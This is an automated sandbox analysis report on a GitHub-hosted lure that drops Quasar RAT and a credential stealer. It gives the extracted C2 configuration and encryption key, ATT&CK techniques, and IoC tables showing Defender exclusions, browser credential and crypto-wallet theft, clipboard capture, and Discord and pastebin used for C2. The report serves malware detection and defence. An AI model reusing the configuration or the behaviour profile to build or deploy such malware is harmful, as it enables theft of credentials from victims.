quasar | hxxps://github[.]com/Solanaowner11/Solanaowner

Analysis

max time kernel
300s
max time network
303s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
04-02-2025 03:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Solanaowner11/Solanaowner

Score

10^/10

quasar office04 collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

192.168.1.10:4782

Mutex

dd5f878b-f89d-46e1-9f9e-bbe6dc23dbee

Attributes

encryption_key
3E0B177139C795934C0AD52498FB433DFFF662C7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023c5f-498.dat	family_quasar
behavioral1/memory/568-1209-0x0000000000630000-0x0000000000954000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2668	powershell.exe
2956	powershell.exe
1252	powershell.exe
4116	powershell.exe
5160	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
56	2924	msedge.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 15 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	Client.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3100	cmd.exe
5436	powershell.exe

Executes dropped EXE 19 IoCs

pid	Process
2600	Built.exe
4112	Built.exe
4680	rar.exe
568	Nitro Generator 2.1.exe
916	Client.exe
4680	Client.exe
3900	Client.exe
1676	Client.exe
2176	Client.exe
2124	Client.exe
3124	Client.exe
5828	Client.exe
180	Client.exe
5792	Client.exe
5416	Client.exe
5524	Client.exe
3124	Client.exe
3060	Client.exe
3440	Client.exe

Loads dropped DLL 17 IoCs

pid	Process
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe
4112	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
151	discord.com
199	discord.com
201	discord.com
215	pastebin.com
216	pastebin.com
55	raw.githubusercontent.com
56	raw.githubusercontent.com
152	discord.com
200	discord.com
214	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
149	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3480	tasklist.exe
5424	tasklist.exe
5228	tasklist.exe
732	tasklist.exe

Probable phishing domain 1 TTPs 1 IoCs

Phishing

T1566

description	flow	ioc	stream
HTTP URL	215	https://pastebin.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=90c7b0ae4e968862	3

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023ceb-914.dat	upx
behavioral1/memory/4112-918-0x00007FFE25610000-0x00007FFE25C75000-memory.dmp	upx
behavioral1/files/0x0007000000023cde-920.dat	upx
behavioral1/memory/4112-923-0x00007FFE40260000-0x00007FFE40287000-memory.dmp	upx
behavioral1/files/0x0007000000023ce9-922.dat	upx
behavioral1/files/0x0007000000023cdd-933.dat	upx
behavioral1/memory/4112-939-0x00007FFE42950000-0x00007FFE4295F000-memory.dmp	upx
behavioral1/files/0x0007000000023ce3-938.dat	upx
behavioral1/files/0x0007000000023ce2-937.dat	upx
behavioral1/files/0x0007000000023ce1-936.dat	upx
behavioral1/files/0x0007000000023ce0-935.dat	upx
behavioral1/files/0x0007000000023cdf-934.dat	upx
behavioral1/files/0x0007000000023cf0-932.dat	upx
behavioral1/files/0x0007000000023cef-931.dat	upx
behavioral1/files/0x0007000000023cee-930.dat	upx
behavioral1/files/0x0007000000023cea-927.dat	upx
behavioral1/files/0x0007000000023ce8-926.dat	upx
behavioral1/memory/4112-944-0x00007FFE38F70000-0x00007FFE38F9B000-memory.dmp	upx
behavioral1/memory/4112-945-0x00007FFE38F50000-0x00007FFE38F69000-memory.dmp	upx
behavioral1/memory/4112-946-0x00007FFE38F20000-0x00007FFE38F45000-memory.dmp	upx
behavioral1/memory/4112-947-0x00007FFE288E0000-0x00007FFE28A5F000-memory.dmp	upx
behavioral1/memory/4112-948-0x00007FFE38F00000-0x00007FFE38F19000-memory.dmp	upx
behavioral1/memory/4112-949-0x00007FFE3A490000-0x00007FFE3A49D000-memory.dmp	upx
behavioral1/memory/4112-950-0x00007FFE38EC0000-0x00007FFE38EF3000-memory.dmp	upx
behavioral1/memory/4112-951-0x00007FFE25610000-0x00007FFE25C75000-memory.dmp	upx
behavioral1/memory/4112-955-0x00007FFE40260000-0x00007FFE40287000-memory.dmp	upx
behavioral1/memory/4112-954-0x00007FFE250D0000-0x00007FFE25603000-memory.dmp	upx
behavioral1/memory/4112-952-0x00007FFE28590000-0x00007FFE2865E000-memory.dmp	upx
behavioral1/memory/4112-956-0x00007FFE38EA0000-0x00007FFE38EB4000-memory.dmp	upx
behavioral1/memory/4112-958-0x00007FFE3A420000-0x00007FFE3A42D000-memory.dmp	upx
behavioral1/memory/4112-957-0x00007FFE38F70000-0x00007FFE38F9B000-memory.dmp	upx
behavioral1/memory/4112-963-0x00007FFE284D0000-0x00007FFE28583000-memory.dmp	upx
behavioral1/memory/4112-962-0x00007FFE38F50000-0x00007FFE38F69000-memory.dmp	upx
behavioral1/memory/4112-1064-0x00007FFE38F20000-0x00007FFE38F45000-memory.dmp	upx
behavioral1/memory/4112-1091-0x00007FFE288E0000-0x00007FFE28A5F000-memory.dmp	upx
behavioral1/memory/4112-1178-0x00007FFE38EC0000-0x00007FFE38EF3000-memory.dmp	upx
behavioral1/memory/4112-1180-0x00007FFE28590000-0x00007FFE2865E000-memory.dmp	upx
behavioral1/memory/4112-1183-0x00007FFE250D0000-0x00007FFE25603000-memory.dmp	upx
behavioral1/memory/4112-1194-0x00007FFE25610000-0x00007FFE25C75000-memory.dmp	upx
behavioral1/memory/4112-1200-0x00007FFE288E0000-0x00007FFE28A5F000-memory.dmp	upx
behavioral1/memory/4112-1231-0x00007FFE25610000-0x00007FFE25C75000-memory.dmp	upx
behavioral1/memory/4112-1256-0x00007FFE28590000-0x00007FFE2865E000-memory.dmp	upx
behavioral1/memory/4112-1255-0x00007FFE38EC0000-0x00007FFE38EF3000-memory.dmp	upx
behavioral1/memory/4112-1254-0x00007FFE3A490000-0x00007FFE3A49D000-memory.dmp	upx
behavioral1/memory/4112-1253-0x00007FFE38F00000-0x00007FFE38F19000-memory.dmp	upx
behavioral1/memory/4112-1252-0x00007FFE288E0000-0x00007FFE28A5F000-memory.dmp	upx
behavioral1/memory/4112-1251-0x00007FFE38F20000-0x00007FFE38F45000-memory.dmp	upx
behavioral1/memory/4112-1250-0x00007FFE38F50000-0x00007FFE38F69000-memory.dmp	upx
behavioral1/memory/4112-1249-0x00007FFE38F70000-0x00007FFE38F9B000-memory.dmp	upx
behavioral1/memory/4112-1248-0x00007FFE42950000-0x00007FFE4295F000-memory.dmp	upx
behavioral1/memory/4112-1247-0x00007FFE40260000-0x00007FFE40287000-memory.dmp	upx
behavioral1/memory/4112-1246-0x00007FFE250D0000-0x00007FFE25603000-memory.dmp	upx
behavioral1/memory/4112-1245-0x00007FFE284D0000-0x00007FFE28583000-memory.dmp	upx
behavioral1/memory/4112-1244-0x00007FFE3A420000-0x00007FFE3A42D000-memory.dmp	upx
behavioral1/memory/4112-1243-0x00007FFE38EA0000-0x00007FFE38EB4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 15 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3496	PING.EXE
4560	PING.EXE
5936	PING.EXE
1972	PING.EXE
5208	PING.EXE
6132	PING.EXE
4244	PING.EXE
5956	PING.EXE
5320	PING.EXE
5960	PING.EXE
2060	PING.EXE
5608	PING.EXE
5244	PING.EXE
4020	PING.EXE
836	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1676	cmd.exe
5564	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4476	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5752	systeminfo.exe

Kills process with taskkill 16 IoCs

defense_evasion

pid	Process
5292	taskkill.exe
1968	taskkill.exe
4864	taskkill.exe
5832	taskkill.exe
5556	taskkill.exe
4440	taskkill.exe
2892	taskkill.exe
6000	taskkill.exe
5324	taskkill.exe
2996	taskkill.exe
5808	taskkill.exe
6136	taskkill.exe
5748	taskkill.exe
5680	taskkill.exe
3388	taskkill.exe
3928	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f44471a0359723fa74489c55595fe6b30ee0000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Downloads"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "5"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\NodeSlot = "4"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 810131.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\SubDir\Client.exe\:SmartScreen:$DATA	Nitro Generator 2.1.exe

Runs ping.exe 1 TTPs 15 IoCs

Remote System Discovery

T1018

pid	Process
5936	PING.EXE
3496	PING.EXE
5956	PING.EXE
5320	PING.EXE
5608	PING.EXE
6132	PING.EXE
1972	PING.EXE
2060	PING.EXE
5244	PING.EXE
4020	PING.EXE
4244	PING.EXE
4560	PING.EXE
836	PING.EXE
5960	PING.EXE
